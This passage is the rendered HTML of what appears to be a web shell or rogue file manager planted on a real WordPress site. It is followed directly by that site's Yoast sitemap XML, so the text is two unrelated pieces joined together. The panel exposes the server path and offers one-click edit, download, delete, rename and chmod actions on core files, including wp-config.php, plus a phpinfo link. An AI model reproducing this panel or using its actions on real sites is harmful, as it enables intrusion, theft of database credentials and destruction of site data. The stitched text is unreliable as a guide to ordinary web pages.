                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-config.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-config.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-config.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📁</td>
                <td>
                                            <a href="?dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-content" class="dir-link">wp-content</a>/
                                    </td>
                <td style="font-family:monospace; font-size:11px">0755</td>
                <td style="font-size:12px">-</td>
                <td class="actions">
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-content">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-content&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-content permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-content">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-cron.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">5.49 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-cron.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-cron.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-cron.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-cron.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-cron.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-cron.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-cron.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📁</td>
                <td>
                                            <a href="?dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-includes" class="dir-link">wp-includes</a>/
                                    </td>
                <td style="font-family:monospace; font-size:11px">0755</td>
                <td style="font-size:12px">-</td>
                <td class="actions">
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-includes">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-includes&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-includes permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-includes">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-links-opml.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">2.43 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-links-opml.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-links-opml.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-links-opml.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-links-opml.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-links-opml.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-links-opml.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-links-opml.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-load.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">3.84 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-load.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-load.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-load.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-load.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-load.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-load.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-load.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-login.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">50.23 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-login.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-login.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-login.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-login.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-login.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-login.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-login.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-settings.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">30.33 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-settings.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-settings.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-settings.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-settings.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-settings.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-settings.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-settings.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-signup.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">33.71 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-signup.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-signup.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-signup.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-signup.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-signup.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-signup.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-signup.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-trackback.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">5.09 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-trackback.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-trackback.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-trackback.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-trackback.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-trackback.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-trackback.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-trackback.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            xmlrpc.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">3.13 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fxmlrpc.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fxmlrpc.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fxmlrpc.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/xmlrpc.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fxmlrpc.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete xmlrpc.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/xmlrpc.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                    </tbody>
    </table>
    
    <!-- PHP Info Link -->
    <hr>
    <a href="?phpinfo=1" target="_blank">🔧 System Information (phpinfo)</a>
    </div>
</body>
</html><?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//bietthunamcuong.com.vn/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://bietthunamcuong.com.vn/post-sitemap.xml</loc>
		<lastmod>2024-04-13T03:49:28+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://bietthunamcuong.com.vn/page-sitemap.xml</loc>
		<lastmod>2026-04-28T11:27:28+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://bietthunamcuong.com.vn/blocks-sitemap.xml</loc>
		<lastmod>2021-10-23T03:37:35+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->